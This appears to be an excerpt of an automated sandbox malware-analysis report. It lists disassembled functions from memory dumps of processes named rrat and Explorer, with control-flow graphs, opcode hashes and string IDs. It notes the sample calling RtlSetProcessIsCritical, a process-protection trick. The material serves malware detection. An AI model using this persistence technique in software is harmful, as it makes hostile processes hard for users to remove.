                                                              • Opcode Fuzzy Hash: 6cf7a827d317b0753bd73813e326d42821fef1ad9c6ab11cc4d76442d4514e83
                                                              • Instruction Fuzzy Hash: 7B11F2B59006498FCB20DF9AD584BDEBFF4FF48310F208019D918A7250C775A944CFA5
                                                              Function 00B0D6DC Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 508 b0d6dc-b0d6ee 509 b0d782-b0d789 508->509 510 b0d6f4 508->510 511 b0d6f6-b0d702 509->511 510->511 512 b0d708-b0d72a 511->512 513 b0d78e-b0d793 511->513 515 b0d798-b0d7ad 512->515 516 b0d72c-b0d74a 512->516 513->512 520 b0d764-b0d76c 515->520 519 b0d752-b0d762 516->519 519->520 521 b0d7ba 519->521 522 b0d76e-b0d77f 520->522 523 b0d7af-b0d7b8 520->523 523->522
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088650289.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b0d000_rrat.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54990c8ede3a1549952c96428e060d4b7590c80cc2edcaa375e21e51c4686a54
                                                              • Instruction ID: 17a79a5c2bb1f09caa5272083c65e7c701cbbf403892e8a4696badd4b616ef46
                                                              • Opcode Fuzzy Hash: 54990c8ede3a1549952c96428e060d4b7590c80cc2edcaa375e21e51c4686a54
                                                              • Instruction Fuzzy Hash: ED210375544204DFCB05DF94D9C0B26BFA6FB98324F2085A9E9090B2D6C33ADC56DAA2
                                                              Function 00B0D6D7 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088650289.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b0d000_rrat.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: ccd752d7f1d72f1a4bbfe510032b176565f24165ec6b85064e578dbac111f918
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: 6A11D376504244CFCB06CF54D5C4B16BFB2FB94324F24C6E9D9490B296C336D85ACBA2
                                                              Function 00B0D006 Relevance: .0, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088650289.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b0d000_rrat.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 030d6c1437843e1a272d4f8bfb39c89efaf9b2e716ce86538b8a6e467221e319
                                                              • Instruction ID: 7b8f1bcf6cc0aaa725bd3e336d504439eae914cbfee6558e1d0ad890e6cd3c4f
                                                              • Opcode Fuzzy Hash: 030d6c1437843e1a272d4f8bfb39c89efaf9b2e716ce86538b8a6e467221e319
                                                              • Instruction Fuzzy Hash: 800129714093849ED7128A258894652BFA8EF53224F1984DBE9888F2E7D2695C45CB72
                                                              Function 00B0D01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2088650289.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_b0d000_rrat.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 20965fda425a177c3f374a2475898522aa6f6aa910e4bbebfef0d641a8ac6564
                                                              • Instruction ID: 6c5179536dfda029d612fed15d423d112eb6bea01f41661ea3ba58387503e4e2
                                                              • Opcode Fuzzy Hash: 20965fda425a177c3f374a2475898522aa6f6aa910e4bbebfef0d641a8ac6564
                                                              • Instruction Fuzzy Hash: 5D012B715053049EE7208E55CCC4B67BFDCEF45320F18C4A9ED4D0B2C6D2799801CAB5

                                                              Execution Graph

                                                              Execution Coverage:21.7%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:3
                                                              Total number of Limit Nodes:0
                                                              execution_graph 2692 29727d8 2693 297281b RtlSetProcessIsCritical 2692->2693 2694 297284c 2693->2694

                                                              Executed Functions

                                                              Function 029727D0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 316 29727d0-2972813 317 297281b-297284a RtlSetProcessIsCritical 316->317 318 2972851-297286a 317->318 319 297284c 317->319 319->318
                                                              APIs
                                                              • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 0297283D
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4490742809.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_2970000_Explorer.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: 797077d2f12add35d58628b25a5f76175591669afc6397e8f08f007fcbba0f4f
                                                              • Instruction ID: 24ba2063420f745d20350d0bc00a8c47fd76f09995740c99a4b94dbc9b0ff4ab
                                                              • Opcode Fuzzy Hash: 797077d2f12add35d58628b25a5f76175591669afc6397e8f08f007fcbba0f4f
                                                              • Instruction Fuzzy Hash: A41113B58042488FCB20DF9AC584ADEBFF4EB49310F208059D959A3251C779A545CFA1
                                                              Function 029727D8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 321 29727d8-297284a RtlSetProcessIsCritical 323 2972851-297286a 321->323 324 297284c 321->324 324->323
                                                              APIs
                                                              • RtlSetProcessIsCritical.NTDLL(?,?,?), ref: 0297283D
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4490742809.0000000002970000.00000040.00000800.00020000.00000000.sdmp, Offset: 02970000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_2970000_Explorer.jbxd
                                                              Similarity
                                                              • API ID: CriticalProcess
                                                              • String ID:
                                                              • API String ID: 2695349919-0
                                                              • Opcode ID: ca5542bacb50893857a3751f71c753d30b139a5e45f50c47d21d0275f7d975bd
                                                              • Instruction ID: 48136df54e1bc4bd045fd016483ea5fe40b9de85e8c45f86979631af048177c2
                                                              • Opcode Fuzzy Hash: ca5542bacb50893857a3751f71c753d30b139a5e45f50c47d21d0275f7d975bd
                                                              • Instruction Fuzzy Hash: 9911F2B59006488FCB20DF9AC984ADEBFF4FB49310F208059D919A7250C779A944CFA5
                                                              Function 00D9D0EC Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4489944551.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_d9d000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be0d72698c0c1d6b6eea3ff4bea80969234f43e4d8d9355a133314e8812afd2e
                                                              • Instruction ID: 0b764c7a440b8e6909a37c7b6edc01cbd425f6ddbda23106a888c744b737ae28
                                                              • Opcode Fuzzy Hash: be0d72698c0c1d6b6eea3ff4bea80969234f43e4d8d9355a133314e8812afd2e
                                                              • Instruction Fuzzy Hash: 1321F272544304AFDF04DF24D980B26BB66FB94314F24C569D8495B396C33AD806CAB1
                                                              Function 00D9D0E7 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4489944551.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_d9d000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: 0e92b01b1e2af85dbbdf16db929d61cd6b5735df0a832307635ae8b1fa4317c2
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: 1C119D76504380DFDB06CF14D9C4B15BFB2FB84314F28C6A9D8494B656C33AD84ACBA2
                                                              Function 00D8D01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4489886972.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_d8d000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1d344334ac410e7d53e0edeae1e89e3a4e9ffe444a99a32c2aac6d8b4cb48a1f
                                                              • Instruction ID: 3db04774943580aa21905b10b6fc5dd4459e3d3c794eb2e2174acf6085fd17c3
                                                              • Opcode Fuzzy Hash: 1d344334ac410e7d53e0edeae1e89e3a4e9ffe444a99a32c2aac6d8b4cb48a1f
                                                              • Instruction Fuzzy Hash: 30012B714043449AE720AE16CC84B67BF9DEF45324F2CC429ED480B2C6C279D801C7B1
                                                              Function 00D8D005 Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.4489886972.0000000000D8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D8D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_d8d000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7d53a5e49a84475224af192840f3e95caa773adde611cd7f0b98abafd31cfba5
                                                              • Instruction ID: a0ccbfd6f20548d222b7c8d2da431960d4f3575e9bcbece321329aa8acca2821
                                                              • Opcode Fuzzy Hash: 7d53a5e49a84475224af192840f3e95caa773adde611cd7f0b98abafd31cfba5
                                                              • Instruction Fuzzy Hash: F4014C6140E3C09ED7128B258C94A52BFB4EF57224F1D80DBD9888F2E7C2695849C772

                                                              Executed Functions

                                                              Function 03401111 Relevance: 3.9, Strings: 3, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (aq$Te]q$d6p
                                                              • API String ID: 0-967301506
                                                              • Opcode ID: 044dcd8865099a46a52d3ccf246c0a2ae2caa17b599604ef2bd75860ac767c91
                                                              • Instruction ID: 360a0dfff25d83cef1083d3e7f58ecd1c71ad3ba571b0c37752d16bb2b5d2f89
                                                              • Opcode Fuzzy Hash: 044dcd8865099a46a52d3ccf246c0a2ae2caa17b599604ef2bd75860ac767c91
                                                              • Instruction Fuzzy Hash: B3515D39B101149FC744DF69C498B9EBBF6FF88710F2580AAE406EB3A5CA75DC018B95
                                                              Function 03400F78 Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq$dLcq
                                                              • API String ID: 0-1713614415
                                                              • Opcode ID: 392f36e872d4c6ac5042821e397c628d664f7aa5fb17484d645adbbd6e2c83c9
                                                              • Instruction ID: b536fc5084f39bf8b9c27bcf37602b525749ad7b379fb4968baf3c83c830c28e
                                                              • Opcode Fuzzy Hash: 392f36e872d4c6ac5042821e397c628d664f7aa5fb17484d645adbbd6e2c83c9
                                                              • Instruction Fuzzy Hash: FE41B1307042049FCB05DF69D498B9EBBF6EF89300F1484AAE405DB3A5CA74DC05CB91
                                                              Function 0340168C Relevance: 1.7, Strings: 1, Instructions: 480COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q
                                                              • API String ID: 0-3081347316
                                                              • Opcode ID: ccad9abb12609a54e02c121b3c09ff64acc143b53ab390f3ff937e2b6f8f6476
                                                              • Instruction ID: dfdf273f3b3f0c68ea1d00348b16f29b41f4874bda64f7a4dd42541c4504e2a7
                                                              • Opcode Fuzzy Hash: ccad9abb12609a54e02c121b3c09ff64acc143b53ab390f3ff937e2b6f8f6476
                                                              • Instruction Fuzzy Hash: D031A034F002169FCB45EB79845566F7BF6FF89214B144079E009EB3A4DE34DC028B92
                                                              Function 034015CD Relevance: 1.7, Strings: 1, Instructions: 472COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q
                                                              • API String ID: 0-3081347316
                                                              • Opcode ID: 67490948f10960e0d5fb41cfa740fa348d5da8f2b42047c61312e3b5f229c3c0
                                                              • Instruction ID: e92a3b773da1aed525f72c5ec33e485224b0a58ea3b59ffbb2d83e140106c678
                                                              • Opcode Fuzzy Hash: 67490948f10960e0d5fb41cfa740fa348d5da8f2b42047c61312e3b5f229c3c0
                                                              • Instruction Fuzzy Hash: 63312334F082468FC741DB78885466EBBF2EF85300B1844BAD04ADB3A5DA34DC02C796
                                                              Function 03400F68 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: dLcq
                                                              • API String ID: 0-2236789282
                                                              • Opcode ID: 5c2c95c083c8288ef81795887f0655b49c1e57831bd5574bbf9a4299a9350611
                                                              • Instruction ID: a4aea3619fe30796a6c2e4d4df80eb7aca54c6b94649c53c59dafbe6ab61bc33
                                                              • Opcode Fuzzy Hash: 5c2c95c083c8288ef81795887f0655b49c1e57831bd5574bbf9a4299a9350611
                                                              • Instruction Fuzzy Hash: 92319C75A002059FCB14DF69C588BAEBBF6FF48300F18856AE445AB3A1CB75EC05CB90
                                                              Function 03401097 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq
                                                              • API String ID: 0-725504367
                                                              • Opcode ID: 69fecda24e21a3da0e96f53c3ddf34d7ebbaee3207282e8df6c4fb7c9847a85b
                                                              • Instruction ID: c23b25bfe76a92b6166499b0feaf347b4cd30d4b951859d41618d4be75f41263
                                                              • Opcode Fuzzy Hash: 69fecda24e21a3da0e96f53c3ddf34d7ebbaee3207282e8df6c4fb7c9847a85b
                                                              • Instruction Fuzzy Hash: 65F02B317082501FC3459B3DA89466E7BD7EFDA66076A84FEE109CB39ACD28CC038391
                                                              Function 03400740 Relevance: .2, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5195f5e9f31de51b522a36d95dd10d7988f17d8f7b32702b61abc5e4d8da98b5
                                                              • Instruction ID: feb450169ab81aa30880a5690df44fcce51359919180e1889cd61b27f36c3132
                                                              • Opcode Fuzzy Hash: 5195f5e9f31de51b522a36d95dd10d7988f17d8f7b32702b61abc5e4d8da98b5
                                                              • Instruction Fuzzy Hash: D8F08C70A0E3C8AFC702CF799964649BFB5AA47100B0540EFD849DB193E5351E05C792
                                                              Function 03400CFB Relevance: .1, Instructions: 116COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1adce2dc4332750cf4b0275da472294bd65d62d23cb22d738fd0b69adb959255
                                                              • Instruction ID: b60c79d5a4ee59a5548a8aa3523b06fe9bbbe823a1d31c41398d69ddb8a6b771
                                                              • Opcode Fuzzy Hash: 1adce2dc4332750cf4b0275da472294bd65d62d23cb22d738fd0b69adb959255
                                                              • Instruction Fuzzy Hash: FD51E630601291CFD715EF24F594959777BFF84305320866DD8068B368DB79AD4ACF82
                                                              Function 03401428 Relevance: .1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bdb57ffa0ee55484ca5873b3307296a622c4a196e7bcae172a819d269cff7e68
                                                              • Instruction ID: 5c44d2253419f0dbfc6348e228ed717392deb45d8f39373e648292bb217f8c5e
                                                              • Opcode Fuzzy Hash: bdb57ffa0ee55484ca5873b3307296a622c4a196e7bcae172a819d269cff7e68
                                                              • Instruction Fuzzy Hash: 5A41A070F00209AFCB04EFB985846AEFBFAEF88300F20C56AD459D7355DA349D418B95
                                                              Function 03400A28 Relevance: .1, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa1001e106daa7d65951a0df5147c6dfbcad5e4262c230ead5a26d2e10d247b4
                                                              • Instruction ID: a32cd0a397839157c7901bb5487c48db9015df3d39a3f50b4bf0b4064e44e853
                                                              • Opcode Fuzzy Hash: fa1001e106daa7d65951a0df5147c6dfbcad5e4262c230ead5a26d2e10d247b4
                                                              • Instruction Fuzzy Hash: 3C318030700242CFDB64DBB5995872B7AAAEF94249B08443FD816DB2C4EF34D905CB9A
                                                              Function 03400A38 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2b51874391973cf2103649f85ec9239cd43a0b34733908e277556006705e62d7
                                                              • Instruction ID: 0dd7ad624ac1857a02feb99729499af79e1a6990c0dc20831adbb2e2c0a36c92
                                                              • Opcode Fuzzy Hash: 2b51874391973cf2103649f85ec9239cd43a0b34733908e277556006705e62d7
                                                              • Instruction Fuzzy Hash: 0E315070700243CFDB64EBB4A55472B76AAEF90659B08443ED816DB2C4EF34D905CB9A
                                                              Function 03401A91 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e90ac1c8997a046ff8ae60cfad45f59777182701e9a12fdfe1d13ca63f8904b5
                                                              • Instruction ID: efed1b523e508dcd5232353272717ffa80daf106cc43a83cc6c9edf73220a944
                                                              • Opcode Fuzzy Hash: e90ac1c8997a046ff8ae60cfad45f59777182701e9a12fdfe1d13ca63f8904b5
                                                              • Instruction Fuzzy Hash: 3A115774B00245DFCB54EBB9D44466A7BF6EF89204B1408BAD40AEB395EA34D942CB85
                                                              Function 03401AA0 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3068b1f54a8459f59c4fe760a21f900041d0dae9e9a873566417e6aa2713679f
                                                              • Instruction ID: 890cdcee8cb0d7966affe38640251633a3467ec5158b78b55e95f1d1e3090d5f
                                                              • Opcode Fuzzy Hash: 3068b1f54a8459f59c4fe760a21f900041d0dae9e9a873566417e6aa2713679f
                                                              • Instruction Fuzzy Hash: 38117974B00205DFCB54EFB9950462B7BEAEF8820071048BAD40ADB394EA34DC42CB95
                                                              Function 017BD01D Relevance: .0, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2158750480.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_17bd000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7bd6764d9f24aaed4dc52a80ac0aa37d77f1af570ea002c99a289a929a3087e4
                                                              • Instruction ID: bc400f5c538a0498e65c385769e69f5d6d2a4dcf1c381d792109309571f2bb0e
                                                              • Opcode Fuzzy Hash: 7bd6764d9f24aaed4dc52a80ac0aa37d77f1af570ea002c99a289a929a3087e4
                                                              • Instruction Fuzzy Hash: 81012B711043009AE7308A99CDC4BE7FFDCEF463A8F18C569ED484B286C3799801CAB1
                                                              Function 03400BA8 Relevance: .0, Instructions: 40COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 80416f174a6734d6d9aee9ea4fea779160a2c2bf10b8d0fc6fc8917e793c7f7f
                                                              • Instruction ID: afd4cb1bffb9218b58c35ef4a26dc4a83cbc94036df795f2b8c7c56d81430e33
                                                              • Opcode Fuzzy Hash: 80416f174a6734d6d9aee9ea4fea779160a2c2bf10b8d0fc6fc8917e793c7f7f
                                                              • Instruction Fuzzy Hash: 57017130A15244CFC718DF68E5086AD7BB2FB00304B98847ED80ADF281EB76ED01DB96
                                                              Function 017BD01C Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2158750480.00000000017BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_17bd000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7b70643c680f7dfeb96be51159920449562a78b8ff70a549dc0994d58caa86d4
                                                              • Instruction ID: 9e91d2c1d5c758213bd13bab6b707bb705c15235c580307fc4fcf82017726256
                                                              • Opcode Fuzzy Hash: 7b70643c680f7dfeb96be51159920449562a78b8ff70a549dc0994d58caa86d4
                                                              • Instruction Fuzzy Hash: 8AF0C8710043449EE7208A19C8C47A2FFD8EF42674F18C55AED480A286C3795840CAB0
                                                              Function 03400B97 Relevance: .0, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07ef53ff3467e032d3b2f4a0ccdd1ef074a9a42133c9e553a09001bbbdffd6ee
                                                              • Instruction ID: 283c8b6630f35f070ab5af53ed3548cf745b4524032b423680d840c5b9dbdaa2
                                                              • Opcode Fuzzy Hash: 07ef53ff3467e032d3b2f4a0ccdd1ef074a9a42133c9e553a09001bbbdffd6ee
                                                              • Instruction Fuzzy Hash: B0014B70A15244DFCB64EF78A5082AEBBB1FF45304B94847ED449DB280E772A906DB92
                                                              Function 03400C39 Relevance: .0, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0ed609d006cca71b1c0053044c121b78091b4b5cf323147b0abf770d1115d963
                                                              • Instruction ID: c3aa1d67072f1aaf61acd49099c6bc42f66e17cab548ae65a0f6b7e43b77c1f3
                                                              • Opcode Fuzzy Hash: 0ed609d006cca71b1c0053044c121b78091b4b5cf323147b0abf770d1115d963
                                                              • Instruction Fuzzy Hash: 37E0DF74A09208EFC348DFB4DE0174AB7BDEB46200F0001FE840CD7254DA384D058BE2
                                                              Function 03400C48 Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1016fe2dd8b94e17b45dcce718f4d39aa65871f535802caa61659db23b847e68
                                                              • Instruction ID: 74ef30d1a03d21a8e858ca0993df36818c2571a6bde79dbe630b34ff892e9508
                                                              • Opcode Fuzzy Hash: 1016fe2dd8b94e17b45dcce718f4d39aa65871f535802caa61659db23b847e68
                                                              • Instruction Fuzzy Hash: D8D05E70A4020DEFD744EFA8EE01A5EB7BEEB44200F1041A8C80CC7210EB355E058B92
                                                              Function 03400848 Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2159099076.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_3400000_Explorer.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 036d03b783c3d10c9f69eb73afd98f7d5133efbb073e780f76e477ce6be1d0f6
                                                              • Instruction ID: 59f2664acfcb4978a73440dc3d00b632610083a31ad5728e59b4a38ad901ada6
                                                              • Opcode Fuzzy Hash: 036d03b783c3d10c9f69eb73afd98f7d5133efbb073e780f76e477ce6be1d0f6
